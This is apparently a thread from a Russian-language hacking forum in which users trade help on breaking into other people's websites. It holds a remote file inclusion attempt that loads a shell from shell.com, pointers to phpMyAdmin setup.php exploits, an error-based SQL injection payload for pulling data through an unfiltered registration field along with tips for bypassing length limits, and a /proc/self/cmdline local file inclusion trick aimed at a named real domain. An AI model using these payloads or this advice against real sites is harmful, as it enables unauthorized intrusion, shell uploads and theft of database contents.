Теперь я знаю какой код на странице <?php require $page ?> т.е это получается инклуд всё-таки...но почему он при site.com/page.php=http://shell.com/shell.php показывает шелл, но на моём же хосте? Подскажите плиз как залить шелл сюда? register_globals=Off
Есть на одном сайте phpMyAdmin 2.11.11.3 c не потертым сетапом. Есть ли возможность получить доступ к бд или залить шелл? Все-таки версия старая, да и /scripts/setup.php доступен, но эксплойты найти не могу. В базах эксплойтов ничего нет, да и активное гугление не помогло. Есть ли вообще известные уязвимости под эту версию?
https://rdot.org/forum/showpost.php?p=13736&postcount=6 при mq=off и PHP <= 5.2.13 или PHP <= 5.3.2 https://rdot.org/forum/showpost.php?p=18082&postcount=20 или сплоит мага, был раньше здесь http://snipper.ru/view/103/phpmyadmin-33102-3431-session-serializer-arbitrary-php-code-execution-exploit/ Можно эксплуатировать, как обычный инклуд RFI, LFI.
подскажите, есть регистрация на сайте,одно из полей не фильтруется, что можно сделать? ввел например туда '1 и он ошибку вывел You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '1', ''1', '0',0)' at line 1
Вывести данные из базы, в ошибке, вбив в не фильтруемое поле: ' and (select 1 from(select count(*), concat(version(), 0x00, floor(rand(0)*2))x РЕАЛЬНАЯ_ТАБЛИЦА group by x)a) or '
там ограничение 40 символов к сожалению там два поля идет уязвимых, там идет первое поле 40 символов, второе поле 40 символов, '0', 0); т.е так скорей всего 'тут первое поле','тут второе','0',0); в скрипте ограничение
ограничение где именно? в форме, или в обрабатываемом скрипте? если первое, то легко обходится, посылкой собственного запроса второе к сожалению не обойти
Попробуй, используя оперу изменить исходный код поля, тем самым убрать ограничение на кол-во символов.
запрос выглядит как: site.ru/generat1.php?src=sitefotos/sitefotos_13153512082010.jpg при подмене на site.ru/generat1.php?src=site.ru/1.gif выводит картинку.. скрипты и т д не исполняет... что делать?
CheatXX, попробуй так разделить запросы например ReV0LVeR, ничего кроме раскрытия пути ты не получишь думаю.
там 140 символов получается, а два поля дают только 80) может кто то сайт посмотреть ? ссылку в лс скину еше 1 поле есть, ограничения нет но выдает: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'accounts group by x)a) or '',0)' at line 1
LFI А при каких условиях пхп кода и настроек апача удаеться провести такой финт с выполнением пхп кода: Code: http://zamok-met.ru/catalog.php?id=../../../../proc/self/cmdline%00&<?php print php_uname();?>
В первую очередь у пользователя под которым работает веб-сервер непосредственно обрабатывающий PHP скрипты должны быть права на виртуальную файловую ситстему /proc. Во вторых в скрипте в функции инклуда не должно быть препенда вида /xxx.$etc Далее как было указано многоуважаемым Expl0ited не через браузер ибо url-encoded строка делается. Так-же , в скрипте может оказывать влияние какая-либо фильтрация или рекодировка и прочие финты программиста. Естественно magic_quotes Off.